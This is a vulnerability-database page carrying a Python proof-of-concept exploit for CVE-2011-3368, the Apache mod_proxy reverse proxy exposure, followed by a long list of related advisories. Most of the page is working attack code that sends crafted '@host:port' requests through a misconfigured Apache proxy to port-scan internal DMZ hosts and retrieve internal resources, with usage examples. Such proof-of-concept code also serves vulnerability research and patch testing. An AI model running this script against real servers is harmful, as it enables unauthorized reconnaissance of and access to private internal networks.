Lucene search
RootSSV:20993HistoryOct 12, 2011 - 12:00 a.m.
Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
2011-10-1200:00:00
Root
www.seebug.org
431
0.974 High
EPSS
Percentile
99.9%
No description provided by source.
#!/usr/bin/env python
import socket
import string
import getopt, sys
known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]
def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
get = get + "Host: " + apache_target + "\r\n\r\n"
remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remoteserver.settimeout(3)
try:
remoteserver.connect((apache_target, int(apache_port)))
remoteserver.send(get)
return remoteserver.recv(4096)
except:
return ""
def get_banner(result):
return result[string.find(result, "\r\n\r\n")+4:]
def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
for port in tested_ports:
port = str(port)
result = send_request(url, apache_target, apache_port, internal_target, port, resource)
if string.find(result,"HTTP/1.1 200")!=-1 or \
string.find(result,"HTTP/1.1 30")!=-1 or \
string.find(result,"HTTP/1.1 502")!=-1:
print "- Open port: " + port + "/TCP"
print get_banner(result)
elif len(result)==0:
print "- Filtered port: " + port + "/TCP"
else:
print "- Closed port: " + port + "/TCP"
def usage():
print
print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
print "http://www.secforce.co.uk"
print
print "usage():"
print "python apache_scan.py [options]"
print
print " [options]"
print " -r: Remote Apache host"
print " -p: Remote Apache port (default is 80)"
print " -u: URL on the remote web server (default is /)"
print " -d: Host in the DMZ (default is 127.0.0.1)"
print " -e: Port in the DMZ (enables 'single port scan')"
print " -g: GET request to the host in the DMZ (default is /)"
print " -h: Help page"
print
print "examples:"
print " - Port scan of the remote host"
print " python apache_scan.py -r www.example.com -u /images/test.gif"
print " - Port scan of a host in the DMZ"
print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
print " - Retrieve a resource from a host in the DMZ"
print " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
print
def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
print
print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
print "http://www.secforce.co.uk"
print
print " [+] Target: " + apache_target
print " [+] Target port: " + apache_port
print " [+] Internal host: " + internal_target
print " [+] Tested ports: " + str(tested_ports)
print " [+] Internal resource: " + resource
print
def main():
global apache_target
global apache_port
global url
global internal_target
global internal_port
global resource
try:
opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
except getopt.GetoptError:
usage()
sys.exit(2)
try:
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit(2)
if o == "-u":
url=a
if o == "-r":
apache_target=a
if o == "-p":
apache_port=a
if o == "-d":
internal_target = a
if o == "-e":
internal_port=a
if o == "-g":
resource=a
except getopt.GetoptError:
usage()
sys.exit(2)
if apache_target == "":
usage()
sys.exit(2)
url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"
main()
if internal_port!="":
tested_ports = [internal_port]
else:
tested_ports = known_ports
scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)
Related
packetstorm
packetstorm
Apache Reverse Proxy Bypass
2011-10-06 00:00:00
Apache mod_proxy Proof Of Concept
2011-10-11 00:00:00
cve
cve
seebug
seebug
Apache HTTP Server 'mod_proxy'ๅๅไปฃ็ไฟกๆฏๆณ้ฒๆผๆด
2011-10-08 00:00:00
Apache mod_proxy Reverse Proxy Exposure
2011-10-06 00:00:00
securityvulns
securityvulns
[ MDVSA-2011:144 ] apache
2011-10-12 00:00:00
Apache mod_proxy unauthorized internal network access
2012-01-11 00:00:00
[Announce] Apache HTTP Server 2.2.22 Released
2012-02-03 00:00:00
altlinux
altlinux
Security fix for the ALT Linux 10 package apache2 version 2.2.21-alt2
2011-11-19 00:00:00
Security fix for the ALT Linux 9 package apache2 version 2.2.21-alt2
2011-11-19 00:00:00
Security fix for the ALT Linux 8 package apache2 version 2.2.21-alt2
2011-11-19 00:00:00
openvas
openvas
FreeBSD Ports: apache
2012-02-13 00:00:00
Oracle Linux Local Check: ELSA-2011-1392
2015-10-06 00:00:00
Mandriva Update for apache MDVSA-2011:144 (apache)
2011-10-10 00:00:00
ubuntucve
ubuntucve
nessus
nessus
Mandriva Linux Security Advisory : apache (MDVSA-2011:144)
2011-10-10 00:00:00
FreeBSD : Apache 1.3 -- mod_proxy reverse proxy exposure (d8c901ff-0f0f-11e1-902b-20cf30e32f6d)
2011-11-15 00:00:00
CentOS 4 / 5 : httpd (CESA-2011:1392)
2011-10-21 00:00:00
freebsd
freebsd
Apache 1.3 -- mod_proxy reverse proxy exposure
2011-10-05 00:00:00
apache -- multiple vulnerabilities
2011-10-05 00:00:00
debiancve
debiancve
httpd
httpd
Apache Httpd < 1.3-never : mod_proxy reverse proxy exposure
2011-09-16 00:00:00
Apache Httpd < 2.0.65 : mod_proxy reverse proxy exposure
2011-09-16 00:00:00
Apache Httpd < 2.2.22 : mod_proxy reverse proxy exposure
2011-09-16 00:00:00
checkpoint_advisories
checkpoint_advisories
Apache HTTPD mod_proxy Information Disclosure (CVE-2011-3368)
2011-11-01 00:00:00
Apache HTTPD mod_proxy Security Bypass (CVE-2011-3368)
2012-03-05 00:00:00
exploitpack
exploitpack
Apache mod_proxy - Reverse Proxy Exposure
2011-10-11 00:00:00
prion
prion
Design/Logic Flaw
2011-10-05 22:55:00
Design/Logic Flaw
2011-11-30 04:05:00
Design/Logic Flaw
2011-11-30 04:05:00
oraclelinux
oraclelinux
httpd security and bug fix update
2011-10-20 00:00:00
httpd security and bug fix update
2011-10-20 00:00:00
threatpost
threatpost
New Apache Reverse Proxy Issue Uncovered
2011-11-26 23:41:49
veracode
veracode
Information Disclosure
2020-04-10 01:03:06
Man-in-the-Middle (MitM)
2020-04-10 01:10:15
Unauthorized Reverse Proxy Connection
2020-04-10 01:10:16
exploitdb
exploitdb
Apache mod_proxy - Reverse Proxy Exposure
2011-10-11 00:00:00
redhat
redhat
(RHSA-2011:1392) Moderate: httpd security and bug fix update
2011-10-20 00:00:00
(RHSA-2011:1391) Moderate: httpd security and bug fix update
2011-10-20 00:00:00
(RHSA-2012:0323) Moderate: httpd security update
2012-02-21 00:00:00
amazon
amazon
Medium: httpd
2011-10-31 18:19:00
Medium: httpd
2012-02-16 10:48:00
centos
centos
httpd, mod_ssl security update
2011-10-20 21:19:56
httpd, mod_ssl security update
2012-02-14 11:13:29
thn
thn
New Apache Reverse Proxy Flaw Allows Access to Internal Network
2011-11-27 08:58:00
f5
f5
suse
suse
Security update for Apache2 (important)
2011-11-04 09:08:25
apache2: Fixed several security issues (important)
2011-11-04 09:08:34
Security update for apache2 (important)
2011-11-09 19:08:34
nmap
nmap
http-vuln-cve2011-3368 NSE Script
2011-11-17 19:33:19
ubuntu
ubuntu
Apache vulnerabilities
2011-11-11 00:00:00
fedora
fedora
[SECURITY] Fedora 16 Update: httpd-2.2.22-1.fc16
2012-02-21 01:28:42
[SECURITY] Fedora 15 Update: httpd-2.2.22-1.fc15
2012-03-06 19:30:50
osv
osv
apache2 - multiple issues
2012-02-06 00:00:00
debian
debian
[SECURITY] [DSA 2405-1] apache2 security update
2012-02-06 09:06:39
[SECURITY] [DSA 2405-1] apache2 security update
2012-02-06 09:06:39
slackware
slackware
[slackware-security] httpd
2012-02-10 17:43:57
ibm
ibm
kaspersky
kaspersky
KLA10065 Multiple vulnerabilities in Apache httpd
2013-07-22 00:00:00
gentoo
gentoo
Apache HTTP Server: Multiple vulnerabilities
2012-06-24 00:00:00
hackerone
hackerone
U.S. Dept Of Defense: Out-of-date Version (Apache)
2016-11-24 15:09:27
oracle
oracle
Oracle Critical Patch Update - July 2012
2012-07-17 00:00:00
Oracle Critical Patch Update Advisory - January 2015
2015-03-10 00:00:00